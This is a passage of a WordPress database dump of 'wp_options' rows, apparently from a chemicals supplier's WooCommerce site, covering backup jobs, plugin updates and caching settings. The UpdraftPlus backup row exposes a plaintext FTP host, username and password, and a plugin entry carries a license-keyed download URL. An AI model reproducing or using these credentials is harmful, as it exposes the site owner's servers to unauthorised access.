INSERT INTO `wp_options` VALUES (574236, 'updraft_jobdata_90a272988531', 'a:59:{s:15:"resume_interval";i:600;s:8:"job_type";s:6:"backup";s:9:"jobstatus";s:14:"clouduploading";s:11:"backup_time";i:1478173818;s:11:"job_time_ms";d:1478173818.6516129970550537109375;s:7:"service";a:1:{i:0;s:3:"ftp";}s:11:"split_every";i:400;s:11:"maxzipbatch";i:209715200;s:17:"job_file_entities";a:4:{s:7:"plugins";a:1:{s:5:"index";i:0;}s:6:"themes";a:1:{s:5:"index";i:0;}s:7:"uploads";a:1:{s:5:"index";i:11;}s:6:"others";a:1:{s:5:"index";i:0;}}s:12:"option_cache";a:4:{s:11:"updraft_ftp";a:5:{s:4:"host";s:13:"132.148.10.86";s:4:"user";s:6:"mourad";s:4:"pass";s:11:"MSRipyak99!";s:4:"path";s:0:"";s:7:"passive";s:1:"1";}s:25:"updraft_ssl_disableverify";s:1:"0";s:17:"updraft_ssl_nossl";s:1:"0";s:26:"updraft_ssl_useservercerts";s:1:"0";}s:18:"uploaded_lastreset";i:0;s:8:"one_shot";b:0;s:18:"followsups_allowed";b:1;s:15:"backup_database";a:1:{s:2:"wp";a:2:{s:6:"status";s:8:"finished";s:6:"dbinfo";a:0:{}}}s:12:"backup_files";s:8:"finished";s:12:"runs_started";a:1:{i:0;d:1478173820.613421916961669921875;}s:18:"current_resumption";i:0;s:6:"binzip";s:12:"/usr/bin/zip";s:22:"filecreating_substatus";a:3:{s:1:"e";s:6:"others";s:1:"i";i:4;s:1:"t";i:4;}s:19:"files_enumerated_at";a:4:{s:7:"plugins";i:1478173822;s:6:"themes";i:1478173846;s:7:"uploads";i:1478173855;s:6:"others";i:1478174022;}s:9:"run_times";a:1:{i:0;d:514.5636451244354248046875;}s:14:"useful_checkin";i:0;s:13:"sha1-plugins0";s:40:"c172d4bde32167d66109def83b63c8af8faf91b7";s:12:"sha1-themes0";s:40:"1dae20db401e5129650f66b1c74d460a6a4ac650";s:13:"sha1-uploads0";s:40:"66c1dac2f3f92c779e59ee5352c22ecfa4c7213d";s:13:"sha1-uploads1";s:40:"5033c6d8cfed3822ad9e370db67ecfffe17b44a5";s:13:"sha1-uploads2";s:40:"25011c641e4644440017728dbb3a2b7ae476e7c2";s:13:"sha1-uploads3";s:40:"9925fb36347c4b86f33166372fe3175e2faf5de0";s:13:"sha1-uploads4";s:40:"d301de98b6a1cbc414eddd954dffb9fd048b944a";s:13:"sha1-uploads5";s:40:"d4ae397ab879e09d594194cedc07d87c264d3a22";s:13:"sha1-uploads6";s:40:"c55459fb93c0babd0f11eee612aa9d31f4dd3b51";s:13:"sha1-uploads7";s:40:"647411d9422d919378dfca32fda48e5d0e3ea21f";s:13:"sha1-uploads8";s:40:"0108131d6d3a7ca5855d2b514323e63e2813a99a";s:13:"sha1-uploads9";s:40:"571114b59f2f95f105fa77089f9cd785447483ff";s:14:"sha1-uploads10";s:40:"6a89c9c3b7c98c268c0287c37cff0141e176e849";s:14:"sha1-uploads11";s:40:"84e5009623827b852653f0f271a388b9ae0b8baa";s:12:"sha1-others0";s:40:"97aab35e0d6636f435684defb7683c8021c62735";s:18:"backup_files_array";a:19:{s:7:"plugins";a:1:{i:0;s:74:"backup_2016-11-03-1150_MillerStephenson_Chemicals_90a272988531-plugins.zip";}s:12:"plugins-size";i:60713041;s:6:"themes";a:1:{i:0;s:73:"backup_2016-11-03-1150_MillerStephenson_Chemicals_90a272988531-themes.zip";}s:11:"themes-size";i:22491666;s:7:"uploads";a:12:{i:0;s:74:"backup_2016-11-03-1150_MillerStephenson_Chemicals_90a272988531-uploads.zip";i:1;s:75:"backup_2016-11-03-1150_MillerStephenson_Chemicals_90a272988531-uploads2.zip";i:2;s:75:"backup_2016-11-03-1150_MillerStephenson_Chemicals_90a272988531-uploads3.zip";i:3;s:75:"backup_2016-11-03-1150_MillerStephenson_Chemicals_90a272988531-uploads4.zip";i:4;s:75:"backup_2016-11-03-1150_MillerStephenson_Chemicals_90a272988531-uploads5.zip";i:5;s:75:"backup_2016-11-03-1150_MillerStephenson_Chemicals_90a272988531-uploads6.zip";i:6;s:75:"backup_2016-11-03-1150_MillerStephenson_Chemicals_90a272988531-uploads7.zip";i:7;s:75:"backup_2016-11-03-1150_MillerStephenson_Chemicals_90a272988531-uploads8.zip";i:8;s:75:"backup_2016-11-03-1150_MillerStephenson_Chemicals_90a272988531-uploads9.zip";i:9;s:76:"backup_2016-11-03-1150_MillerStephenson_Chemicals_90a272988531-uploads10.zip";i:10;s:76:"backup_2016-11-03-1150_MillerStephenson_Chemicals_90a272988531-uploads11.zip";i:11;s:76:"backup_2016-11-03-1150_MillerStephenson_Chemicals_90a272988531-uploads12.zip";}s:12:"uploads-size";i:423987176;s:13:"uploads1-size";i:413439728;s:13:"uploads2-size";i:413916670;s:13:"uploads3-size";i:418197239;s:13:"uploads4-size";i:386933088;s:13:"uploads5-size";i:419954452;s:13:"uploads6-size";i:420784504;s:13:"uploads7-size";i:425703058;s:13:"uploads8-size";i:421350775;s:13:"uploads9-size";i:416881103;s:14:"uploads10-size";i:411528772;s:14:"uploads11-size";i:221326056;s:6:"others";a:1:{i:0;s:73:"backup_2016-11-03-1150_MillerStephenson_Chemicals_90a272988531-others.zip";}s:11:"others-size";i:1552250;}s:10:"binsqldump";b:0;s:20:"dbcreating_substatus";a:3:{s:1:"t";s:18:"wp_yith_wcwl_lists";s:1:"i";i:65;s:1:"a";i:65;}s:8:"warnings";a:0:{}s:8:"sha1-db0";s:40:"33f36413115958b44eb8fb7b4692a1ba5b9ab87c";s:19:"uploading_substatus";a:3:{s:1:"i";i:8;s:1:"p";d:0.0200000000000000004163336342344337026588618755340576171875;s:1:"t";i:16;}s:45:"uploaded_ftp-883631548c2ab0cf418c43452c098fa6";s:3:"yes";s:41:"uploaded_883631548c2ab0cf418c43452c098fa6";s:3:"yes";s:45:"uploaded_ftp-e8520026897da5aa31cb9939606c5574";s:3:"yes";s:41:"uploaded_e8520026897da5aa31cb9939606c5574";s:3:"yes";s:45:"uploaded_ftp-2dd7d435240cd8ce139d250e153ba4f3";s:3:"yes";s:41:"uploaded_2dd7d435240cd8ce139d250e153ba4f3";s:3:"yes";s:45:"uploaded_ftp-5e72d7c02754567ef5bee2e9dd812d60";s:3:"yes";s:41:"uploaded_5e72d7c02754567ef5bee2e9dd812d60";s:3:"yes";s:45:"uploaded_ftp-2b3c8625ed88e5ea522f88a693f5c1a0";s:3:"yes";s:41:"uploaded_2b3c8625ed88e5ea522f88a693f5c1a0";s:3:"yes";s:45:"uploaded_ftp-08ef455d27fe6b020914253c6fed77fc";s:3:"yes";s:41:"uploaded_08ef455d27fe6b020914253c6fed77fc";s:3:"yes";s:45:"uploaded_ftp-46f29b6884069c1245f98970bc39d646";s:3:"yes";s:41:"uploaded_46f29b6884069c1245f98970bc39d646";s:3:"yes";s:45:"uploaded_ftp-02e7ba25026fe471a6f6b90bb5f65c00";s:3:"yes";s:41:"uploaded_02e7ba25026fe471a6f6b90bb5f65c00";s:3:"yes";}', 'no'); 
INSERT INTO `wp_options` VALUES (574264, '_transient_update_plugins', 'O:8:"stdClass":2:{s:12:"last_checked";i:0;s:8:"response";a:1:{s:43:"product-enquiry-pro/product_enquiry_pro.php";O:8:"stdClass":9:{s:11:"new_version";s:5:"4.2.0";s:4:"name";s:19:"Product Enquiry Pro";s:4:"slug";s:19:"product_enquiry_pro";s:3:"url";s:64:"https://wisdmlabs.com/downloads/product-enquiry-pro/?changelog=1";s:12:"last_updated";s:19:"2016-12-28 18:19:43";s:8:"homepage";s:52:"https://wisdmlabs.com/downloads/product-enquiry-pro/";s:7:"package";s:158:"https://wisdmlabs.com/edd-sl/package_download/MjM1OTI4MDQ4MzozNzc3MTRmYzQ4OWM0YjIwMTkyM2NhNDRlOGYwNzk5MDozMjEyOjM0MDBiNmNmYzUyMzBlZTEzM2Q5NjRhZDU2Y2ViNjlhOg==";s:13:"download_link";s:158:"https://wisdmlabs.com/edd-sl/package_download/MjM1OTI4MDQ4MzozNzc3MTRmYzQ4OWM0YjIwMTkyM2NhNDRlOGYwNzk5MDozMjEyOjM0MDBiNmNmYzUyMzBlZTEzM2Q5NjRhZDU2Y2ViNjlhOg==";s:8:"sections";a:2:{s:11:"description";s:90:"<p>Add an inquiry button on every WooCommerce product page and the shop archive page.</p>\n";s:9:"changelog";s:6145:"<p>4.1.0</p>\n<ul>\n<li>Feature - Added support for all variations of variable products.</li>\n<li>Feature - Provided bulk actions on products listing page to \'enable/disable enquiry\', \'show/hide price\' and \'enable/disable add to cart\'.</li>\n<li>Fix - CSS issue in some browsers.</li>\n<li>Fix - Made changes in session library to remove conflict with other plugins.</li>\n</ul>\n<p>4.0.2</p>\n<ul>\n<li>Fix - Fixed \'Click Here\' link that wasn\'t displaying in the generated pdf\'s.</li>\n</ul>\n<p>4.0.1</p>\n<ul>\n<li style="color: #000000;">Feature - Added support to variable products same as version 3.1.1 with some inprovements.</li>\n</ul>\n<p>4.0</p>\n<ul>\n<li style="color: #000000;">Feature - Added quotation system.</li>\n<li style="color: #000000;">Feature - Improved quotation details layout (when quotation system is enabled).</li>\n<li style="color: #000000;">Feature - Receive quote request from customers.</li>\n<li style="color: #000000;">Feature - Create quotes and send it to your customers right from the dashboard.</li>\n<li style="color: #000000;">Feature - Auto-generation of quotation PDF.</li>\n<li style="color: #000000;">Feature - Product specific show or hide price on frontend.</li>\n<li style="color: #000000;">Fix - Improved the dashboard layout for both enquiry and quotation system.</li>\n<li style="color: #000000;">Fix - Fixed error with setting woocommerce cart page as enquiry cart.</li>\n<li style="color: #000000;">Fix - Displaying quote button for products which are displayed using any woocommerce shortcode.</li>\n<li style="color: #000000;">Fix - Product enquiry pro settings does not take effects on variable products.</li>\n</ul>\n<p>3.1.1</p>\n<ul>\n<li style="color: #000000;">Hover feature added.</li>\n<li style="color: #000000;">Shortcode automatically added on enquiry cart page.</li>\n<li style="color: #000000;">Shortcode removed from old enquiry cart page on enquiry cart page change.</li>\n<li style="color: #000000;">Problem with adding custom fields on single enquiry form.</li>\n<li style="color: #000000;">Problem with adding custom fields on multiple enquiry form.</li>\n<li style="color: #000000;">Removed minimum 15 characters message validation on enquiry form.</li>\n</ul>\n<p>3.1.0</p>\n<ul>\n<li style="color: #000000;">Hover feature added.</li>\n<li style="color: #000000;">Enquiry time issue on enquiry details page.</li>\n<li style="color: #000000;">Issue when we change products sale price.</li>\n<li style="color: #000000;">Issue when changing product image.</li>\n<li style="color: #000000;">Message validation on enquiry form.</li>\n<li style="color: #000000;">Warnings and notices on plugin activation.</li>\n<li style="color: #000000;"> Issue with product url not sent in the email</li>\n<li style="color: #000000;">Issue with sku not sent in the email</li>\n<li style="color: #000000;">Issue with enquiry button on archive pages</li>\n</ul>\n<p>3.0.1</p>\n<ul>\n<li style="color: #000000;">Issue with plugin update fixed.</li>\n</ul>\n<p>3.0.0</p>\n<ul>\n<li style="color: #000000;">Feature for multi-product enquiry</li>\n<li style="color: #000000;">Option for admin to reply to enquiry from dashboard.</li>\n</ul>\n<p>2.2.1</p>\n<ul>\n<li style="color: #000000;">Fixed warnings and redirect issues with the last update</li>\n<li style="color: #000000;">Compatible with WordPress 4.3.1 and WooCommerce 2.4.10</li>\n</ul>\n<p>2.2.0</p>\n<ul>\n<li style="color: #000000;">Enquiry button on shop archive page</li>\n<li style="color: #000000;">Option to apply global settings for all products</li>\n</ul>\n<p>2.1.4</p>\n<ul>\n<li style="color: #000000;">Resolved the issue with the Add to cart button being displayed twice</li>\n<li style="color: #000000;">Feature to select the county for telephone number field validation added</li>\n<li style="color: #000000;">Compatible with WooCommerce 2.4.6 and WordPress 4.3</li>\n</ul>\n<p>2.1.3</p>\n<ul>\n<li style="color: #000000;">Feature to make the telephone number field mandatory</li>\n</ul>\n<p>2.1.2</p>\n<ul>\n<li style="color: #000000;"><strong> </strong>Plugin license code updated</li>\n</ul>\n<p>2.1.1</p>\n<ul>\n<li style="color: #000000;"><strong> </strong>Added feature to redirect user on submitting the enquiry</li>\n</ul>\n<p>2.1</p>\n<ul style="color: #000000;">\n<li>Added feature to enable/disable add to cart button</li>\n<li>Form field accepts the name of the user making the enquiry</li>\n<li>Compatible with WooCommerce 2.3.7</li>\n</ul>\n<p>2.0</p>\n<ul style="color: #000000;">\n<li>Added filters to allow users to customise enquiry form.</li>\n<li>Added functionality to display additional fields in enquiry table.</li>\n<li>Added German language files.</li>\n<li>Added Dutch language files.</li>\n</ul>\n<p>1.4.0</p>\n<ul style="color: #000000;">\n<li>Feature to add multiple recipient email addresses.</li>\n<li>Display Enquiry button only when product is out of stock.</li>\n<li>Added Swedish language files.</li>\n<li>Fixed warnings.</li>\n</ul>\n<p>1.3.1</p>\n<ul style="color: #000000;">\n<li>Settings provided to add Enquiry Button to selected products.</li>\n<li>Added Blog\'s Name in the Subject of emails that are sent out.</li>\n<li>Many Hooks and Filters have been added. Developers can now add their own hidden field on the form.</li>\n<li>Added SKU Field in the form.</li>\n<li>CSS Box on Settings page to add custom CSS.</li>\n<li>If WPML is enabled, then sends out email to Admin and Author in the language they have set in their profile.</li>\n<li>If WPML is enabled, then sends out email to customers in the language they are viewing the website.</li>\n</ul>\n<p>1.3.0</p>\n<ul style="color: #000000;">\n<li>Provided checkbox to replace enquiry button with link</li>\n<li>reply-to address changed to senders address</li>\n</ul>\n<p>1.2.1</p>\n<ul style="color: #000000;">\n<li>Fixed Warnings</li>\n<li>Fixed Enquiry Modal issue for fixed header themes</li>\n</ul>\n<p>1.2.0</p>\n<ul style="color: #000000;">\n<li>Fixed Enquiry Modal issue</li>\n<li>Increased Enquiry Message Length</li>\n</ul>\n<p>1.1</p>\n<ul style="color: #000000;">\n<li>Updated Strings on Product Enquiry Dialog</li>\n<li>Changed text of Post Enquiry message</li>\n</ul>\n<p>1.0</p>\n<ul style="color: #000000;">\n<li>Plugin Released</li>\n</ul>\n";}}}}', 'yes'); 
INSERT INTO `wp_options` VALUES (574265, '_transient_update_themes', 'O:8:"stdClass":1:{s:12:"last_checked";i:0;}', 'yes'); 
INSERT INTO `wp_options` VALUES (574333, 'sbp_page_time', '1.30', 'yes'); 
INSERT INTO `wp_options` VALUES (574334, 'sbp_page_queries', '109', 'yes'); 
INSERT INTO `wp_options` VALUES (574335, 'sbp_css_async', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (574336, 'sbp_css_minify', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (574337, 'sbp_footer_css', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (574338, 'sbp_is_mobile', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (574339, 'all_theme_scripts_handle', 'contact-form-7<br />magnific<br />dp_quickview<br />hm_wcps<br />pc_google_analytics-frontend<br />sbp-lazy-load-images<br />jquery-migrate<br />jquery-ui-core<br />SFSIPLUSjqueryModernizr<br />SFSIPLUSjqueryShuffle<br />SFSIPLUSjqueryrandom-shuffle<br />SFSIPLUSCustomJs<br />wc-add-to-cart<br />woocommerce<br />wc-cart-fragments<br />yith_autocomplete<br />jquery-selectBox<br />jquery-yith-wcwl<br />flatsome-woocommerce-wishlist<br />flatsome-live-search<br />multipleSelectJs<br />quoteup-end-approval-script<br />flatsome-js<br />flatsome-theme-woocommerce-js<br />wp-embed<br />flatsome-masonry-js<br />', 'yes'); 
INSERT INTO `wp_options` VALUES (574340, 'all_theme_scripts_src', 'https://www.miller-stephenson.com/wp-content/plugins/contact-form-7/includes/js/scripts.js<br />https://www.miller-stephenson.com/wp-content/plugins/displayProduct//plugin/magnific/magnific.js<br />https://www.miller-stephenson.com/wp-content/plugins/displayProduct//plugin/magnific/magnific-custom.js<br />https://www.miller-stephenson.com/wp-content/plugins/password-strength-for-woocommerce/js/password-strength-wc.js<br />https://www.miller-stephenson.com/wp-content/plugins/pc-google-analytics/assets/js/frontend.min.js<br />https://www.miller-stephenson.com/wp-content/plugins/speed-booster-pack/js/sbp-lazy-load.min.js<br />/wp-includes/js/jquery/jquery-migrate.min.js<br />/wp-includes/js/jquery/ui/core.min.js<br />https://www.miller-stephenson.com/wp-content/plugins/ultimate-social-media-plus/js/shuffle/modernizr.custom.min.js<br />https://www.miller-stephenson.com/wp-content/plugins/ultimate-social-media-plus/js/shuffle/jquery.shuffle.min.js<br />https://www.miller-stephenson.com/wp-content/plugins/ultimate-social-media-plus/js/shuffle/random-shuffle-min.js<br />https://www.miller-stephenson.com/wp-content/plugins/ultimate-social-media-plus/js/custom.js<br />//www.miller-stephenson.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js<br />//www.miller-stephenson.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js<br />//www.miller-stephenson.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js<br />https://www.miller-stephenson.com/wp-content/plugins/yith-woocommerce-ajax-search/assets/js/yith-autocomplete.min.js<br />https://www.miller-stephenson.com/wp-content/plugins/yith-woocommerce-wishlist/assets/js/jquery.selectBox.min.js<br />https://www.miller-stephenson.com/wp-content/plugins/yith-woocommerce-wishlist/assets/js/jquery.yith-wcwl.js<br />https://www.miller-stephenson.com/wp-content/themes/flatsome/inc/integrations/wc-yith-wishlist/wishlist.js<br />https://www.miller-stephenson.com/wp-content/themes/flatsome/inc/extensions/flatsome-live-search/flatsome-live-search.js<br />https://www.miller-stephenson.com/wp-content/plugins/product-enquiry-pro/js/public/multiple-select.js<br />https://www.miller-stephenson.com/wp-content/plugins/product-enquiry-pro/js/public/end-approval-quote-session.js<br />https://www.miller-stephenson.com/wp-content/themes/flatsome/assets/js/flatsome.js<br />https://www.miller-stephenson.com/wp-content/themes/flatsome/assets/js/woocommerce.js<br />/wp-includes/js/wp-embed.min.js<br />https://www.miller-stephenson.com/wp-content/themes/flatsome/assets/libs/packery.pkgd.min.js<br />', 'yes'); 
INSERT INTO `wp_options` VALUES (574341, 'all_theme_styles_handle', 'dp-template-editor<br />contact-form-7<br />disclaimer-manager<br />magnific<br />dp_quickview<br />pc_google_analytics-frontend<br />decision_tree_jquery_ui<br />decisiontree_local_style<br />prefix-font-awesome<br />social-widget<br />SFSIPLUSmainCss<br />ywtm-icon-retinaicon-font<br />ywtm-font-awesome<br />jquery-selectBox<br />flatsome-ninjaforms<br />flatsome-woocommerce-wishlist<br />multipleSelectCss<br />flatsome-main<br />flatsome-shop<br />flatsome-style<br />flatsome-effects<br />', 'yes'); 
INSERT INTO `wp_options` VALUES (574342, 'sbp_settings', 'a:1:{s:9:"lazy_load";s:1:"1";}', 'yes'); 
INSERT INTO `wp_options` VALUES (574344, 'sbp_css_exceptions', '', 'yes'); 
INSERT INTO `wp_options` VALUES (574345, 'sbp_sanitize', '', 'yes'); 
INSERT INTO `wp_options` VALUES (574346, 'sbp_js_footer_exceptions1', '', 'yes'); 
INSERT INTO `wp_options` VALUES (574347, 'sbp_js_footer_exceptions2', '', 'yes'); 
INSERT INTO `wp_options` VALUES (574348, 'sbp_js_footer_exceptions3', '', 'yes'); 
INSERT INTO `wp_options` VALUES (574349, 'sbp_js_footer_exceptions4', '', 'yes'); 
INSERT INTO `wp_options` VALUES (574350, 'sbp_head_html_script1', '', 'yes'); 
INSERT INTO `wp_options` VALUES (574351, 'sbp_head_html_script2', '', 'yes'); 
INSERT INTO `wp_options` VALUES (574352, 'sbp_head_html_script3', '', 'yes'); 
INSERT INTO `wp_options` VALUES (574353, 'sbp_head_html_script4', '', 'yes'); 
INSERT INTO `wp_options` VALUES (574354, 'sbp_defer_exceptions1', '', 'yes'); 
INSERT INTO `wp_options` VALUES (574355, 'sbp_defer_exceptions2', '', 'yes'); 
INSERT INTO `wp_options` VALUES (574356, 'sbp_defer_exceptions3', '', 'yes'); 
INSERT INTO `wp_options` VALUES (574357, 'sbp_defer_exceptions4', '', 'yes'); 
INSERT INTO `wp_options` VALUES (574403, '_site_transient_timeout_browser_7fbb3da0dd1d829e2aa03f69d88f328c', '1478795045', 'no'); 
INSERT INTO `wp_options` VALUES (574404, '_site_transient_browser_7fbb3da0dd1d829e2aa03f69d88f328c', 'a:9:{s:8:"platform";s:7:"Windows";s:4:"name";s:6:"Chrome";s:7:"version";s:12:"54.0.2840.71";s:10:"update_url";s:29:"https://www.google.com/chrome";s:7:"img_src";s:50:"https://s.wordpress.org/images/browsers/chrome.png";s:11:"img_src_ssl";s:48:"https://wordpress.org/images/browsers/chrome.png";s:15:"current_version";s:2:"18";s:7:"upgrade";b:0;s:8:"insecure";b:0;}', 'no'); 
INSERT INTO `wp_options` VALUES (574602, 'wpseo_sitemap_820_cache_validator', '5VSkN', 'no'); 
INSERT INTO `wp_options` VALUES (574647, '_site_transient_timeout_n_nextend581b8fc12f4117.33410059', '1478204881', 'no'); 
INSERT INTO `wp_options` VALUES (574648, '_site_transient_n_nextend581b8fc12f4117.33410059', '1', 'no'); 
INSERT INTO `wp_options` VALUES (574649, '_site_transient_timeout_nextend581b8fc12f4117.33410059_fb_state', '1478204881', 'no'); 
INSERT INTO `wp_options` VALUES (574650, '_site_transient_nextend581b8fc12f4117.33410059_fb_state', 'fad125921a72d8167337613b956c23c3', 'no'); 
INSERT INTO `wp_options` VALUES (574651, '_site_transient_timeout_nextend581b8fc12f4117.33410059_fb_r', '1478204881', 'no'); 
INSERT INTO `wp_options` VALUES (574652, '_site_transient_nextend581b8fc12f4117.33410059_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (574761, '_transient_woocommerce_cache_excluded_uris', 'a:6:{i:0;s:4:"p=20";i:1;s:6:"/cart/";i:2;s:4:"p=21";i:3;s:10:"/checkout/";i:4;s:4:"p=22";i:5;s:12:"/my-account/";}', 'yes'); 
INSERT INTO `wp_options` VALUES (574762, '_transient_woocommerce_webhook_ids', 'a:0:{}', 'yes'); 
INSERT INTO `wp_options` VALUES (574764, '_transient_product_query-transient-version', '1503410627', 'yes'); 
INSERT INTO `wp_options` VALUES (574932, 'updraft_combine_jobs_around', '1478308903', 'yes'); 
INSERT INTO `wp_options` VALUES (574937, '_site_transient_timeout_updraft_initial_resume_interval', '1478914417', 'no'); 
INSERT INTO `wp_options` VALUES (574938, '_site_transient_updraft_initial_resume_interval', '705', 'no'); 
INSERT INTO `wp_options` VALUES (575018, '_site_transient_timeout_n_nextend581c28a69641e7.16985967', '1478244022', 'no'); 
INSERT INTO `wp_options` VALUES (575019, '_site_transient_n_nextend581c28a69641e7.16985967', '1', 'no'); 
INSERT INTO `wp_options` VALUES (575020, '_site_transient_timeout_nextend581c28a69641e7.16985967_google_r', '1478244022', 'no'); 
INSERT INTO `wp_options` VALUES (575021, '_site_transient_nextend581c28a69641e7.16985967_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (575022, '_site_transient_timeout_n_nextend581c28a81afb81.53903815', '1478244024', 'no'); 
INSERT INTO `wp_options` VALUES (575023, '_site_transient_n_nextend581c28a81afb81.53903815', '1', 'no'); 
INSERT INTO `wp_options` VALUES (575024, '_site_transient_timeout_nextend581c28a81afb81.53903815_google_r', '1478244024', 'no'); 
INSERT INTO `wp_options` VALUES (575025, '_site_transient_nextend581c28a81afb81.53903815_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (575056, '_site_transient_timeout_n_nextend581c3db43a2468.02839688', '1478249412', 'no'); 
INSERT INTO `wp_options` VALUES (575057, '_site_transient_n_nextend581c3db43a2468.02839688', '1', 'no'); 
INSERT INTO `wp_options` VALUES (575058, '_site_transient_timeout_nextend581c3db43a2468.02839688_google_r', '1478249412', 'no'); 
INSERT INTO `wp_options` VALUES (575059, '_site_transient_nextend581c3db43a2468.02839688_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (575110, 'w3tc_state', '{"common.install":1478252495,"minify.hide_minify_help":true,"common.show_note.plugins_updated":true,"common.show_note.plugins_updated.timestamp":1485374478,"common.next_support_us_invitation":1487966688,"common.support_us_invitations":1}', 'no'); 
INSERT INTO `wp_options` VALUES (575118, 'w3tc_nr_application_id', '{"d41d8cd98f00b204e9800998ecf8427e":0}', 'yes'); 
INSERT INTO `wp_options` VALUES (575121, 'w3tc_generic_widgetservices', '{"items":[{"name":"Premium Support Response (Usually <1h First Response)","parameter_name":"field4","parameter_value":"Premium Support Response (Usually <1h First Response)","form_hash":"m5pom8z0qy59rm"},{"name":"Performance Audit \\/ Consult (Theme, Plugin, Content, Server)","parameter_name":"field4","parameter_value":"Performance Audit \\/ Consult (Theme, Plugin, Content, Server)","form_hash":"m5pom8z0qy59rm"},{"name":"Plugin Configuration","parameter_name":"field4","parameter_value":"Plugin Configuration","form_hash":"m5pom8z0qy59rm"},{"name":"SSL Performance Setup","parameter_name":"field4","parameter_value":"SSL Performance Setup","form_hash":"m5pom8z0qy59rm"},{"name":"Full Site Delivery Setup","parameter_name":"field4","parameter_value":"Full Site Delivery Setup","form_hash":"m5pom8z0qy59rm"},{"name":"Hosting Environment Troubleshooting","parameter_name":"field4","parameter_value":"Hosting Environment Troubleshooting","form_hash":"m5pom8z0qy59rm"},{"name":"Performance Monitoring","parameter_name":"field4","parameter_value":"Performance Monitoring","form_hash":"m5pom8z0qy59rm"}],"expires":1485979488}', 'no'); 
INSERT INTO `wp_options` VALUES (575136, 'w3tc_minify', '{"bd031.js":["wp-includes\\/js\\/jquery\\/jquery.js","wp-includes\\/js\\/jquery\\/jquery-migrate.min.js","wp-content\\/plugins\\/displayProduct\\/plugin\\/magnific\\/magnific.js"],"124f7.js":["wp-content\\/plugins\\/displayProduct\\/plugin\\/magnific\\/magnific-custom.js","wp-content\\/plugins\\/pc-google-analytics\\/assets\\/js\\/frontend.min.js"],"699a2.js":["wp-content\\/plugins\\/product-enquiry-pro\\/js\\/public\\/end-approval-quote-session.js"],"7dfe4.js":["wp-includes\\/js\\/admin-bar.min.js","wp-content\\/plugins\\/contact-form-7\\/includes\\/js\\/jquery.form.min.js"],"38a3b.js":["wp-content\\/plugins\\/contact-form-7\\/includes\\/js\\/scripts.js","wp-content\\/plugins\\/speed-booster-pack\\/js\\/sbp-lazy-load.min.js"],"dee63.js":["wp-content\\/plugins\\/woocommerce\\/assets\\/js\\/frontend\\/add-to-cart.min.js","wp-content\\/plugins\\/woocommerce\\/assets\\/js\\/jquery-blockui\\/jquery.blockUI.min.js"],"3c2c7.js":["wp-content\\/plugins\\/woocommerce\\/assets\\/js\\/frontend\\/woocommerce.min.js","wp-content\\/plugins\\/woocommerce\\/assets\\/js\\/jquery-cookie\\/jquery.cookie.min.js"],"42d9a.js":["wp-content\\/plugins\\/woocommerce\\/assets\\/js\\/frontend\\/cart-fragments.min.js","wp-content\\/plugins\\/yith-woocommerce-ajax-search\\/assets\\/js\\/yith-autocomplete.min.js","wp-content\\/plugins\\/yith-woocommerce-wishlist\\/assets\\/js\\/jquery.selectBox.min.js"],"0f4ef.js":["wp-content\\/plugins\\/yith-woocommerce-wishlist\\/assets\\/js\\/jquery.yith-wcwl.js","wp-content\\/themes\\/flatsome\\/inc\\/integrations\\/wc-yith-wishlist\\/wishlist.js","wp-content\\/themes\\/flatsome\\/inc\\/extensions\\/flatsome-live-search\\/flatsome-live-search.js","wp-content\\/plugins\\/product-enquiry-pro\\/js\\/public\\/multiple-select.js","wp-includes\\/js\\/hoverIntent.min.js"],"efc16.js":["wp-content\\/themes\\/flatsome\\/assets\\/js\\/flatsome.js","wp-content\\/themes\\/flatsome\\/assets\\/js\\/woocommerce.js","wp-includes\\/js\\/wp-embed.min.js","wp-content\\/themes\\/flatsome\\/assets\\/libs\\/packery.pkgd.min.js"],"f2f8b.css":["wp-content\\/plugins\\/displayProduct\\/assets\\/css\\/template-editor\\/dp-template-editor.css","wp-includes\\/css\\/dashicons.min.css","wp-includes\\/css\\/admin-bar.min.css","wp-content\\/plugins\\/contact-form-7\\/includes\\/css\\/styles.css","wp-content\\/plugins\\/disclaimer-and-notification-manager-for-authors\\/dm-disclaimer-manager.css","wp-content\\/plugins\\/displayProduct\\/plugin\\/magnific\\/magnific.css","wp-content\\/plugins\\/displayProduct\\/plugin\\/magnific\\/magnific-custom.css","wp-content\\/plugins\\/pc-google-analytics\\/assets\\/css\\/frontend.css","wp-content\\/plugins\\/yith-woocommerce-tab-manager-premium\\/assets\\/fonts\\/retinaicon-font\\/style.css","wp-content\\/plugins\\/yith-woocommerce-tab-manager-premium\\/assets\\/css\\/font-awesome.min.css","wp-content\\/plugins\\/yith-woocommerce-wishlist\\/assets\\/css\\/jquery.selectBox.css","wp-content\\/plugins\\/wordpress-seo-premium\\/css\\/adminbar-340.min.css","wp-content\\/themes\\/flatsome\\/inc\\/integrations\\/ninjaforms\\/ninjaforms.css","wp-content\\/themes\\/flatsome\\/inc\\/integrations\\/wc-yith-wishlist\\/wishlist.css","wp-content\\/plugins\\/product-enquiry-pro\\/css\\/public\\/multiple-select.css","wp-content\\/themes\\/flatsome\\/assets\\/css\\/flatsome.css","wp-content\\/themes\\/flatsome\\/assets\\/css\\/flatsome-shop.css","wp-content\\/themes\\/flatsome\\/style.css","wp-content\\/themes\\/flatsome\\/assets\\/css\\/effects.css"],"bd496.js":["wp-content\\/themes\\/flatsome\\/assets\\/js\\/flatsome.js","wp-content\\/themes\\/flatsome\\/assets\\/js\\/woocommerce.js","wp-includes\\/js\\/wp-embed.min.js"],"43245.css":["wp-content\\/plugins\\/displayProduct\\/assets\\/css\\/template-editor\\/dp-template-editor.css","wp-includes\\/css\\/dashicons.min.css","wp-includes\\/css\\/admin-bar.min.css","wp-content\\/plugins\\/contact-form-7\\/includes\\/css\\/styles.css","wp-content\\/plugins\\/disclaimer-and-notification-manager-for-authors\\/dm-disclaimer-manager.css","w